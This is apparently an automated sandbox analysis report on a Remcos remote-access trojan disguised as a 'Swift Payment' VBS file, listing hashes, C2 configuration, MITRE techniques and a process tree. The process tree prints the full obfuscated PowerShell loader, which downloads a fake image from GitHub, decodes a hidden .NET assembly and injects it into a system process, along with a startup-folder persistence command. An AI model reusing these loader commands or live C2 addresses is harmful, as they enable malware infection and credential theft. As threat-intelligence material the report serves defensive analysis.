remcos | 312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891

Analysis

max time kernel
148s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-10-2024 07:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Swift Payment 20241014839374.vbs
Size

193KB
MD5

7bf746f21b05c1eb932ba35c5215e940
SHA1

aa69f725076d84e5fac54816caf29864d007e8da
SHA256

312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891
SHA512

4d85a6ed27ba76fc295ea8bd24cb03bd801bf15d74561af5e24d77ff321960fdc32a6ada12b06865ce3e0002c422ce02ef3e6e11a97be1f8b47cfe6e8facd29f
SSDEEP

3072:8mpzxQF4KEDwjHUiIgt5p5Gw4fiLQtUWBrSp8muIJ8oH7lT:8FF4KEMjHiNrSV8CV

Score

10^/10

remcos octobers collection discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Extracted

Family

remcos

Botnet

OCTOBERS

ab9001.ddns.net:23782

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
VLC.exe
copy_folder
VLC
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Chrorne-28R56P
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Rmc
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1420-137-0x0000000000400000-0x0000000000457000-memory.dmp	Nirsoft
behavioral2/memory/4340-140-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3088-138-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1420-137-0x0000000000400000-0x0000000000457000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3088-138-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3472	powershell.exe
1160	powershell.exe
560	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dentona.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dentona.vbs	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	AddInProcess32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
22	raw.githubusercontent.com

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 560 set thread context of 4472	560	powershell.exe	101
PID 4472 set thread context of 3248	4472	AddInProcess32.exe	102
PID 4472 set thread context of 3088	4472	AddInProcess32.exe	121
PID 4472 set thread context of 1420	4472	AddInProcess32.exe	122
PID 4472 set thread context of 4340	4472	AddInProcess32.exe	123
PID 4472 set thread context of 5332	4472	AddInProcess32.exe	128
PID 4472 set thread context of 5136	4472	AddInProcess32.exe	141
PID 4472 set thread context of 4136	4472	AddInProcess32.exe	151
PID 4472 set thread context of 3836	4472	AddInProcess32.exe	162
PID 4472 set thread context of 720	4472	AddInProcess32.exe	172
PID 4472 set thread context of 688	4472	AddInProcess32.exe	189
PID 4472 set thread context of 6736	4472	AddInProcess32.exe	200

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2572	PING.EXE
4736	cmd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2572	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3472	powershell.exe
3472	powershell.exe
1160	powershell.exe
1160	powershell.exe
560	powershell.exe
560	powershell.exe
3680	msedge.exe
3680	msedge.exe
3276	msedge.exe
3276	msedge.exe
4432	identity_helper.exe
4432	identity_helper.exe
3088	AddInProcess32.exe
3088	AddInProcess32.exe
4340	AddInProcess32.exe
4340	AddInProcess32.exe
3088	AddInProcess32.exe
3088	AddInProcess32.exe
6588	msedge.exe
6588	msedge.exe
6588	msedge.exe
6588	msedge.exe

Suspicious behavior: MapViewOfSection 11 IoCs

pid	Process
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe
4472	AddInProcess32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 35 IoCs

pid	Process
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	4340	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4472	AddInProcess32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4804 wrote to memory of 4736	4804	WScript.exe	85
PID 4804 wrote to memory of 4736	4804	WScript.exe	85
PID 4736 wrote to memory of 2572	4736	cmd.exe	87
PID 4736 wrote to memory of 2572	4736	cmd.exe	87
PID 4736 wrote to memory of 3472	4736	cmd.exe	95
PID 4736 wrote to memory of 3472	4736	cmd.exe	95
PID 4804 wrote to memory of 1160	4804	WScript.exe	97
PID 4804 wrote to memory of 1160	4804	WScript.exe	97
PID 1160 wrote to memory of 560	1160	powershell.exe	114
PID 1160 wrote to memory of 560	1160	powershell.exe	114
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 560 wrote to memory of 4472	560	powershell.exe	101
PID 4472 wrote to memory of 3248	4472	AddInProcess32.exe	102
PID 4472 wrote to memory of 3248	4472	AddInProcess32.exe	102
PID 4472 wrote to memory of 3248	4472	AddInProcess32.exe	102
PID 4472 wrote to memory of 3248	4472	AddInProcess32.exe	102
PID 3248 wrote to memory of 3276	3248	svchost.exe	104
PID 3248 wrote to memory of 3276	3248	svchost.exe	104
PID 3276 wrote to memory of 1528	3276	msedge.exe	105
PID 3276 wrote to memory of 1528	3276	msedge.exe	105
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106
PID 3276 wrote to memory of 4072	3276	msedge.exe	106

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift Payment 20241014839374.vbs"
1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4804
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Swift Payment 20241014839374.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.anotned.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Swift Payment 20241014839374.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.anotned.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVsTGlEWzFdKyRTaEVMTElkWzEzXSsneCcpKCAoKCd7MH1pbWFnZVVyJysnbCA9IHsxfWh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWFkcy9tYWluL0RldGFoTm90ZV9WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVuJysndDt7MH1pbWFnZUJ5dGVzID0gezB9Jysnd2ViQ2xpZW50LkRvd25sb2FkRGF0YSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9c3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBJysnUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfScrJ3N0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgezB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3RoO3swfWJhJysnc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJJysnbmRleDt7MH1iYXNlNjRDbycrJ21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCAnKyd7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlJysnNjRTJysndHJpbmcoezB9YmFzZTY0Q29tbWFuZCk7ezB9bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzJysnZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyknKyc7ezB9dmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkcnKydldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCh7MX0wLzYxNnJyL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgJysnezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9QWRkSW5Qcm8nKydjZXNzMzJ7MX0sIHsnKycxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLUZbY2hhUl0zNixbY2hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHElLiD[1]+$ShELLId[13]+'x')( (('{0}imageUr'+'l = {1}https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg {1};{0}webClient = New-Object System.Net.WebClien'+'t;{0}imageBytes = {0}'+'webClient.DownloadData({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString({0}imageBytes);{0}startFlag = {1}<<BASE64_STA'+'RT>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}'+'startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Length;{0}ba'+'se64Length = {0}endIndex - {0}startI'+'ndex;{0}base64Co'+'mmand = {0}imageText.Substring({0}startIndex, '+'{0}base64Length);{0}commandBytes = [System.Convert]::FromBase'+'64S'+'tring({0}base64Command);{0}loadedAssembly = [System.Reflection.Ass'+'embly]::Load({0}commandBytes)'+';{0}vaiMethod = [dnlib.IO'+'.Home].G'+'etMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @({1}0/616rr/d/ee.etsap//:sptth{1}'+', '+'{1}desa'+'tivado{1}, {1}desativado{1}, {1}desa'+'tivado{1}, {1}AddInPro'+'cess32{1}, {'+'1}desativado{1}, {1}desativado{1}));') -F[chaR]36,[chaR]39))"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4472
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3248
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:1528
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
        7⤵
        
        PID:4072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3680
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
        7⤵
        
        PID:5040
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
        7⤵
        
        PID:4772
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        7⤵
        
        PID:2248
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
        7⤵
        
        PID:560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
        7⤵
        
        PID:5060
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4432
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
        7⤵
        
        PID:312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
        7⤵
        
        PID:776
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
        7⤵
        
        PID:4984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
        7⤵
        
        PID:2904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
        7⤵
        
        PID:5432
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
        7⤵
        
        PID:5516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
        7⤵
        
        PID:5888
        
